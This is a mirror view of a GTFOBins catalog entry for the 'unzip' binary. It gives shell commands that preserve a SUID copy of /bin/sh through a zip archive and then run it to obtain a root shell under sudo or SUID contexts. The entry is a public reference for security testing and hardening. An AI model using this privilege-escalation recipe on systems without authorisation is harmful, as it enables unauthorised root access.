mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2026-03-08 06:56:15 +01:00
19 lines
346 B
Plaintext
19 lines
346 B
Plaintext
---
|
|
comment: |-
|
|
Certain `unzip` versions allows to preserve the SUID bit. For example, prepare an archive beforehand with the following commands as root:
|
|
|
|
```
|
|
cp /bin/sh .
|
|
chmod +s sh
|
|
zip shell.zip sh
|
|
```
|
|
functions:
|
|
privilege-escalation:
|
|
- code: |-
|
|
unzip -K shell.zip
|
|
./sh -p
|
|
contexts:
|
|
sudo:
|
|
suid:
|
|
...
|